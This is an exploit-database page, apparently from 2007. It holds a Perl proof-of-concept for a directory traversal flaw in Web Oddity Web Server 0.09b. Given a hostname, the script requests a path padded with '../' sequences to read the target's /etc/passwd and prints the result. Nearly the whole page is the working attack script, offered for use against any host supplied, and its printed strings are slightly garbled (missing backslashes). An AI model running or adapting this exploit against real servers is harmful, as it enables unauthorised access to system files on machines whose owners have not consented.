[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Web Oddity Web Server 0.09b Directory Transversal Exploit
# Published : 2007-09-04
# Author : Katatafish
# Previous Title : GlobalLink 2.7.0.8 glItemCom.dll SetInfo() Heap Overflow Exploit
# Next Title : Telecom Italy Alice Messenger Remote registry key manipulation Exploit
# Web Oddity Web Server 0.09b Directory Transversal Vulnerability
# Found by: Katatafish (karatatata@hush.com)
# Download: http://sourceforge.net/project/showfiles.php?group_id=13854
# Thanks: str0ke
use LWP::Simple;
use strict;
sub usage
{
print "----------------------------------------------------- - -----------n";
print "Web Oddity Web Server 0.09b Directory Transversal Vulnerabilityn";
print "n";
print "usage: $0 www.site.comn";
print "------------------------------------------------- Katatafish-----n";
exit ();
}
my $host=shift || &usage;
getprint 'http://' . $host . '/../../../../../../../etc/passwd';
# www.Syue.com [2007-09-04]